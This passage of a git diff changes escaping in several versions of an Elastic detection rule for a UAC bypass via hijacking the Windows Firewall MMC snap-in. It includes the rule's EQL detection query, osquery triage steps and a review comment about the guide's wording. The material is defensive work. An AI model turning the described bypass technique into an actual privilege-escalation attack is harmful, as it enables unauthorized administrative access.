!{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n",
 "references": [
 "https://github.com/AzAgarampur/byeintegrity-uac"
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_107.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_107.json
index 9296bbdd4ce..c5137dfed89 100644
--- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n",
 "references": [
 "https://github.com/AzAgarampur/byeintegrity-uac"
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_108.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_108.json
index d01ac0b5c17..dff98cd063a 100644
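Review bot: The investigation guide carried in the new `"note"` value tells analysts to search for logon events (4624) "after the registry modification", but the rule's `"query"` (a context line in this same hunk) matches only process start events whose parent is `mmc.exe` launched with `WF.msc` — nothing in the rule observes a registry write, so that phrase reads as inherited from a registry-based guide. Suggest anchoring the step to what the alert actually gives the analyst, e.g. `- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the suspicious process started.`, or, if the snap-in hijack does depend on a registry change, say so explicitly so the pivot is meaningful. The same wording appears in the `_106`, `_108` and `_109` copies of this rule in the same diff, and the JSON object containing this hunk continues outside it. The hunk's own change is only the unescaping of `\u003e`/`\u003c`/`\u0026` to `>`/`<`/`&`, which parses to identical strings, so this is a documentation point rather than a regression introduced by the commit.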
--- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_108.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n",
 "references": [
 "https://github.com/AzAgarampur/byeintegrity-uac"
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_109.json b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_109.json
index 8f7a2a1417c..e427d5e7963 100644
--- a/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/1178ae09-5aff-460a-9f2f-455cd0ac4d8e_109.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze any suspicious spawned processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All 